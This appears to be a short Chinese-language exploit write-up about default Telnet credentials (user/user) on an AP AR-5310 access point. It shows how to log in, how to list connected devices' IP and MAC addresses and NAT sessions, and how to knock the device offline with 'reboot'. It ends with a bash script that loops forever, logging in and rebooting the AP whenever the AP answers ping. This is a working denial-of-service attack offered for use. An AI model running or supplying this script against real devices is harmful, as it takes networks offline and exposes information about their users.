Telnet 默认凭据可能导致信息泄露和拒绝服务 (DoS) 攻击。
此漏洞影响 AP AR-5310
Telnet 192.168.1.1
username:user
password:user
然后 Boom ... 你已登录
当你通过 Telnet 服务登录后,
输入命令 'help' 或 '?' 可查看
可用选项:
> reboot, ping, lanhosts, passwd
> restoredefault, nslookup, traceroute
> save, uptime, exitOnIdle, wan, version,
> serialnumber, modelname, tr69cfg, nat
要获取连接到网络的每个设备的 IP 和 MAC 地址,
请运行命令 'lanhosts'。
要显示通过接入点 (AP) 的所有 NAT 会话,
请使用命令 'nat show session'
要执行拒绝服务 (DoS) 攻击,
请运行命令 'reboot' 重新启动 AP。
我想编写一个脚本来自动化
持续重启 AP 的操作。
#!/bin/bash
# Telnet credentials
USER="user"
PASSWORD="user"
HOST="192.168.1.1"
# Function to check host availability
check_host_availability() {
ping -c 1 -W 1 "$HOST" > /dev/null 2>&1
return $?
}
# Loop to check host availability and execute Telnet command when available
while true; do
if check_host_availability; then
echo "Host $HOST is reachable. Initiating Telnet connection and reboot..."
{ sleep 1; echo "$USER"; sleep 1; echo "$PASSWORD"; sleep 1; echo "reboot"; sleep 1; } | telnet "$HOST"
else
echo "Host $HOST is not reachable. Retrying in 10 seconds..."
sleep 10
fi
done